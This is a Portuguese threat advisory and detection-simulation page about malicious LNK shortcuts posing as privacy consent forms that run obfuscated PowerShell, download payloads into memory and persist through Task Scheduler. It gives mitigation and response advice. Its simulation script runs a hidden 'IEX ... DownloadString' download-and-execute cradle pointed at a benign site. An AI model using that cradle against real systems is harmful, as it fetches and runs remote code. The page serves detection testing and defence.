O Que Realmente Estava Dentro do Arquivo de Atalho Disfarçado como um Formulário de Consentimento de Privacidade?
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
Atores de ameaças estão distribuindo arquivos LNK maliciosos disfarçados como formulários de consentimento de privacidade para enganar os usuários a abri-los. Quando executados, esses arquivos de atalho lançam comandos PowerShell ofuscados que recuperam e executam cargas adicionais usando técnicas sem arquivo. A cadeia de ataque é projetada para roubar informações e implantar um carregador de backdoor que ajuda a preservar o acesso e a persistência.
Investigação
A investigação mostrou que os arquivos LNK embutem código PowerShell ofuscado responsável por baixar scripts posteriores. Esses scripts secundários incluem um downloader que obtém cargas úteis de serviços web legítimos e um carregador que os executa diretamente na memória. O autor da ameaça também abusa do Agendador de Tarefas do Windows para persistência e usa documentos de isca para fazer parecer que a atividade maliciosa é legítima.
Mitigação
As organizações devem impor verificação rigorosa de extensões de arquivos e alertar os usuários sobre arquivos LNK disfarçados como documentos comuns. As equipes de segurança devem monitorar de perto a atividade do Agendador de Tarefas, logs de execução do PowerShell e conexões de rede de saída. Os usuários também devem ser treinados para validar tanto o remetente quanto o caminho de entrega de qualquer arquivo recebido antes de abri-lo.
Resposta
Se essa atividade for detectada, os administradores devem revisar imediatamente entradas suspeitas do Agendador de Tarefas e a criação incomum de scripts PowerShell em diretórios acessíveis por usuários. Os logs do PowerShell devem ser analisados e as conexões externas devem ser rastreadas, especialmente aquelas envolvendo plataformas de nuvem legítimas ou serviços de armazenamento web. Uma investigação forense completa deve ser realizada em quaisquer scripts maliciosos identificados e tráfego de rede não autorizado.
Fluxo de Ataque
Detecções
Possível Descoberta de Informações do Sistema Usando Módulo Wmi PowerShell (via PowerShell)
Ver
Possíveis Indicadores de Ofuscação de PowerShell (via PowerShell)
Ver
Execução de Arquivo LNK Malicioso Levando a Download Externo e Conexões [Conexão de Rede do Windows]
Ver
Execução e Persistência de Arquivo LNK Malicioso via Agendador de Tarefas [Criação de Processo do Windows]
Ver
Arquivo LNK Malicioso Executando PowerShell Ofuscado [PowerShell do Windows]
Ver
Execução de Simulação
Pré-requisito: O Cheque Pré-Voo de Telemetria e Base deve ter passado.
Justificativa: Esta seção detalha a execução precisa da técnica adversária (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a diagnósticos errados.
-
Narrativa do Ataque & Comandos: O adversário busca estabelecer acesso inicial e baixar uma carga de malware de segunda fase. Para evitar a detecção por scanners de arquivos simples, usam um arquivo LNK (Atalho). Este arquivo LNK é projetado para executar
powershell.exeem uma janela oculta. O comando passado para o PowerShell usaInvoke-ExpressionandDownloadStringpara puxar um script de uma URL remota. Isso imita ataques reais de “Living-off-the-Land” (LotL) onde binários legítimos são usados para executar ações maliciosas, visando burlar antivírus baseados em assinaturas tradicionais. -
Script de Teste de Regressão:
# 1. Defina a URL de destino (usando um site benigno para teste) $url = "https://www.google.com" # 2. Crie a string de carga útil maliciosa de PowerShell # Esta string é projetada para acionar a detecção de 'DownloadString' e 'Invoke-Expression' $payload = "IEX (New-Object Net.WebClient).DownloadString('$url')" # 3. Crie um conteúdo de arquivo LNK fictício (Simulado) # Em um ataque real, este seria um arquivo .lnk binário. # Aqui executamos o comando diretamente para garantir que o log ScriptBlock seja gerado para validação. Write-Host "[+] Simulando execução maliciosa de PowerShell via carga útil LNK..." powershell.exe -WindowStyle Hidden -Command $payload Write-Host "[+] Comando de simulação executado. Verifique o Evento ID 4104." -
Comandos de Limpeza:
# Remova quaisquer artefatos se arquivos foram criados Remove-Item -Path "$HOMEDesktopSimulated_Malicious_LNK.lnk" -ErrorAction SilentlyContinue Write-Host "[+] Limpeza completa."